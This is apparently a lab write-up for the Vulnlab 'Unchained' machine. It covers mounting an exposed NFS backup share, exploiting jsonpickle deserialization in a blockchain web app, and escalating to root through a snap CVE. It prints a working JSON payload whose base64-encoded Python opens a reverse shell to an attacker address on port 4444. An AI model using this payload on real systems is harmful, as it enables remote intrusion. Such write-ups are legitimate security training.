Vulnlab - Unchained [Medium] - 20/08/2023
Vulnlab Writeup
We can first mount the exposed NFS folder called backup
to local folder called mounted
.
sudo mount -t nfs -o nfsvers=3 10.10.89.250:/var/nfs/backup ./mounted -o nolock
We can see the source code is a project that is a result from this course:
Upon reviewing the code that we got from the mount, we can see that the /transaction
path that tries to decode
the value of the transaction
Then it goes into the BlockchainUtils.decode
which has the following code:
It is notable that the jsonpickle
direct decoding can be vulnerable to deserialization, so I’ve crafted the following payload:
{
"transaction": "{\"py\/object\": \"__main__.Transaction\", \"syl\": {\"py\/reduce\": [{\"py\/type\": \"subprocess.Popen\"}, {\"py\/tuple\": [{\"py\/tuple\": [\"python3\", \"-c\", \"import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjguMC4xMDciLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJiYXNoIik='))\"]}]}]}}"
}
I did this payload from scratch, but I found an article that has much more efficient payload here:
Nonetheless we can see that we got a connection back.
After that and after a bit of enumeration we can see that snap
is in the user folder which kind-a hints that. The vulnerability is CVE-2021-44731
, we can find a PoC on GitHub, after that we are root
.